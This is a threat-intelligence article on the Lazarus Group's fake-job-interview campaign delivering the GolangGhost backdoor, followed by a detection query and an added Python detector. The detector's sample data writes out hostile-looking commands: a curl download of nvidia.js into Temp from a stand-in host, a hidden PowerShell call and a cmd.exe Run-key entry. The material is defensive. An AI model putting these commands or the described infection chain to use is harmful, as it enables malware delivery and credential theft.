ClickFake Interview – Lazarus Hackers Target Windows & macOS Users in Fake Job Campaign
The Lazarus Group, a North Korean state-sponsored hacking collective, has launched a new campaign dubbed ClickFake Interview, targeting job seekers in the cryptocurrency industry.
This malicious operation uses fake job interview websites to deploy a Go-based backdoor, known as GolangGhost, on both Windows and macOS systems.
The campaign represents an evolution of the previously documented Contagious Interview campaign, showcasing Lazarus’ adaptability and persistent focus on exploiting the cryptocurrency ecosystem.
Lazarus has been active since at least 2009, conducting cyber espionage and financial operations to support North Korea’s missile and nuclear programs.
Since 2017, the group has increasingly targeted cryptocurrency entities, leveraging malware, supply chain attacks, trojanized applications, and fake job offers.
In March 2025, Lazarus executed the largest crypto heist in history, stealing $1.5 billion from Bybit, a UAE-based exchange—an attack that highlights its growing sophistication.
ClickFake Interview Campaign
The ClickFake Interview campaign builds upon the tactics of Contagious Interview, which targeted software developers via fake job interviews conducted on platforms like LinkedIn or X (formerly Twitter).
In this new campaign, attackers lure victims to fake interview websites crafted using ReactJS. These sites feature dynamic content loaded from JavaScript files and simulate legitimate recruitment processes.
Victims are asked to fill out forms, answer cryptocurrency-related questions, and enable their cameras for interviews.
At a critical point in the process, an error message prompts them to download drivers or scripts—initiating the infection chain.
The infection chain varies depending on the operating system:
- Windows: A Visual Basic Script (VBS) downloads a NodeJS-based payload (nvidia.js) that extracts malicious components into temporary directories. Persistence is established via registry keys, and a batch file silently launches the GolangGhost backdoor.
- macOS: A Bash script (coremedia.sh) downloads and extracts malicious files while creating a launch agent plist file for persistence. Before deploying GolangGhost, a stealer named FrostyFerret retrieves system passwords by mimicking Chrome’s UI.
The GolangGhost implant enables remote control and data theft across both platforms. It can execute shell commands, upload/download files, steal browser data (via HackBrowserData), and exfiltrate sensitive information such as system credentials.
Communication with command-and-control (C2) servers is encrypted using RC4 encryption. The malware ensures only one instance runs at a time by storing unique identifiers in temporary files.
Targeting Centralized Finance (CeFi)
Analysis of fake interview websites revealed that Lazarus primarily targets centralized finance (CeFi) entities like Coinbase, Kraken, Bybit, and Robinhood.
Earlier campaigns focused on decentralized finance (DeFi); this shift aligns with DPRK threat actors’ growing interest in CeFi platforms, which rely on intermediaries for transactions.
Additionally, the job roles advertised in these fake interviews target non-technical profiles, such as managers in business development or asset management, individuals less likely to detect malicious activity during interviews.
The infection chain relies heavily on sequential execution of commands within short time frames.
Detection opportunities include monitoring unusual script execution patterns via tools like Sigma correlation rules or Sekoia Operating Language (SOL) queries.
For example, the following SOL query lists the command lines of the watched binaries, grouped by host and parent process:
events
| where timestamp >= ago(7d)
| where process.command_line contains~ "temp"
| where process.name in ["curl.exe", "powershell.exe", "wscript.exe"]
| aggregate cmd_line = make_set(process.command_line) by host.name, process.parent.pid
Additionally, analyzing registry keys for suspicious entries like cmd.exe can help identify compromised systems.
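The query above and the registry check can be expressed as plain detection logic. The Python below is an added example, not Sekoia's rule or code from the campaign analysis: it applies the same three filters (seven-day window, "temp" in the command line, watched process names), groups by host and parent PID, and only raises a hit when at least two different watched binaries ran within a short window from the same parent, which captures the "sequential execution within short time frames" the text describes rather than any single curl call. The process events, the Run-key values, the host names and the placeholder.invalid URL are all constructed sample data, and the 60-second window and two-process threshold are assumed tuning values.

```python
"""Correlate bursts of script/downloader execution per host and parent process,
and flag autorun Run-key values that launch cmd.exe or point into a temp directory.
All sample data below is constructed for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta

WATCHED = ("curl.exe", "powershell.exe", "wscript.exe")

# Constructed sample events; placeholder.invalid stands in for a download host.
SAMPLE_EVENTS = [
    {"ts": "2025-03-10T09:00:01", "host": "ws01", "ppid": 4100, "proc": "wscript.exe",
     "cmd": r"wscript.exe C:\Users\jdoe\AppData\Local\Temp\update.vbs"},
    {"ts": "2025-03-10T09:00:04", "host": "ws01", "ppid": 4100, "proc": "curl.exe",
     "cmd": r"curl.exe -o C:\Users\jdoe\AppData\Local\Temp\nvidia.js https://placeholder.invalid/nvidia.js"},
    {"ts": "2025-03-10T09:00:09", "host": "ws01", "ppid": 4100, "proc": "powershell.exe",
     "cmd": r"powershell.exe -w hidden Expand-Archive %TEMP%\pkg.zip"},
    # Benign: a single curl from an admin shell with no burst around it.
    {"ts": "2025-03-10T10:15:00", "host": "ws02", "ppid": 9001, "proc": "curl.exe",
     "cmd": r"curl.exe -o C:\Temp\report.csv https://placeholder.invalid/report"},
    # Too old: falls outside the seven-day lookback.
    {"ts": "2025-02-20T12:00:00", "host": "ws03", "ppid": 77, "proc": "wscript.exe",
     "cmd": r"wscript.exe %TEMP%\old.vbs"},
]

NOW = datetime(2025, 3, 12, 0, 0, 0)  # constructed "current time" for the lookback


def filter_events(events, now=NOW, lookback_days=7):
    """Apply the query's three 'where' clauses: time window, 'temp' in the
    command line (case-insensitive, like contains~), and a watched process name."""
    cutoff = now - timedelta(days=lookback_days)
    return [e for e in events
            if datetime.fromisoformat(e["ts"]) >= cutoff
            and "temp" in e["cmd"].lower()
            and e["proc"] in WATCHED]


def correlate(events, window_seconds=60, min_distinct=2):
    """Group by host and parent PID (the 'aggregate ... by' step), then keep only
    groups where at least min_distinct different watched binaries ran within
    window_seconds of each other. Returns {(host, ppid): sorted command lines}."""
    groups = defaultdict(list)
    for e in events:
        groups[(e["host"], e["ppid"])].append(e)
    hits = {}
    for key, evs in groups.items():
        evs.sort(key=lambda e: e["ts"])  # ISO timestamps sort lexically
        times = [datetime.fromisoformat(e["ts"]) for e in evs]
        for start in times:
            in_window = [e for e, t in zip(evs, times)
                         if timedelta(0) <= t - start <= timedelta(seconds=window_seconds)]
            if len({e["proc"] for e in in_window}) >= min_distinct:
                hits[key] = sorted({e["cmd"] for e in in_window})
                break
    return hits


def suspicious_run_values(run_values):
    """Flag Run-key values that start cmd.exe or reference a temp directory.
    run_values maps value name -> command string."""
    return {name: cmd for name, cmd in run_values.items()
            if "cmd.exe" in cmd.lower() or "temp" in cmd.lower()}


# Constructed Run-key contents: one ordinary entry, one that hands off to a temp batch file.
SAMPLE_RUN_VALUES = {
    "OneDrive": r"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "Updater": r"cmd.exe /c start /min C:\Users\jdoe\AppData\Local\Temp\run.bat",
}

if __name__ == "__main__":
    for key, cmds in correlate(filter_events(SAMPLE_EVENTS)).items():
        print("execution burst on", key, "->", cmds)
    print("suspicious Run values:", suspicious_run_values(SAMPLE_RUN_VALUES))
```

On the constructed data only ws01/4100 is reported, since the lone curl on ws02 never meets the two-process threshold; in a real deployment the window and threshold should be tuned against the environment's baseline of legitimate scripted installs.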
The ClickFake Interview campaign underscores Lazarus’ adaptability and sophistication in targeting cryptocurrency entities.
By leveraging fake job offers and evolving tactics like ClickFix, the group continues to pose significant threats to centralized finance platforms globally.
Its focus on non-technical employees suggests a strategic pivot aimed at exploiting less vigilant targets while maintaining its overarching goal of financial gain for North Korea.